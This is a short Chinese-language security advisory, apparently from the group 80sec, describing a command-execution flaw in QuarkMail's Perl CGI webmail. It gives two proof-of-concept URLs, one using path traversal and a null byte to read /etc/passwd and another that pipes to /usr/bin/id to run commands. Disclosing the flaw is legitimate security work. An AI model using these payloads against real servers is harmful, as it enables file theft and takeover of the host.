来源:80sec

漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系 统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。
漏洞厂商:[url]http://www.ipmotor.com/[/url]
漏洞解析:QuarkMail错误地使用perl的open函数以打开文件,实现模板等功能,但是其对用户传入的参数没有做有效的过滤,从而导致一个命令执行漏洞。
漏洞证明:登录进入系统之后访问如下URL
[url]http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../[/url] etc/passwd%00&id=2&sort=0&read_flag=yes
即可得到系统账户文件,访问如下URL
[url]http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/id[/url]|%00&id=2&sort=0&read_flag=yes
即可以将/usr/bin/id文件打开执行,并且将结果返回,用户就可以利用一序列操作获得系统的完整访问权。
漏洞解决:请等待官方补丁。